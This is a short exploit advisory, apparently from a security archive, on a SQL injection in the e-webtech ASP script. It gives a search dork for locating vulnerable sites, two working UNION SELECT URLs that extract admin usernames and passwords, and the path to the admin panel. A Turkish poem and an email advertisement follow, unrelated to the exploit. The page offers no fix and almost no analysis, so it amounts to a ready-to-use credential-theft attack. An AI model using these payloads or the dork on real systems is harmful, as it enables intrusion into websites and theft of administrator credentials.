e-Webtech remote SQL injection

2010-05-12 / 2010-05-13
Credit: CoBRa_21
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-89

------------------------------------------------------------------------------------------- e-webtech (page.asp) SQL Injection Vulnerability ------------------------------------------------------------------------------------------- Author: CoBRa_21 Mail: uyku_cu@windowslive.com Script Name: e-webtech Dork: "Powerd by www.e-webtech.com" ------------------------------------------------------------------------------------------- User Exploit: http://localhost/[path]/page.asp?id=1+union+select+0,1,username+from+adminpassword Password Exploit: http://localhost/[path]/page.asp?id=1+union+select+0,1,pwd+from+adminpassword Administartor Panel: http://localhost/[path]/controlpanel/ ------------------------------------------------------------------------------------------- yle bir zlemiim ki seni Art?k dnsen de olur dnmesen de Ben her daim yine sana sitemli yine sana hasret giderim Aziz yar sen bir sabah bu ehri ba?ma y?k?p gittin Da?lar? deviriverdin stme hi ekinmedin Ben bu ehirde bir daha da sabah grmedim Gnayd?nlar olmad? gnler aymad? sensiz ........ ------------------------------------------------------------------------------------------- _________________________________________________________________ Yeni Windows 7: Gndelik ilerinizi basitletirin. Size en uygun bilgisayar? bulun. http://windows.microsoft.com/shop


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top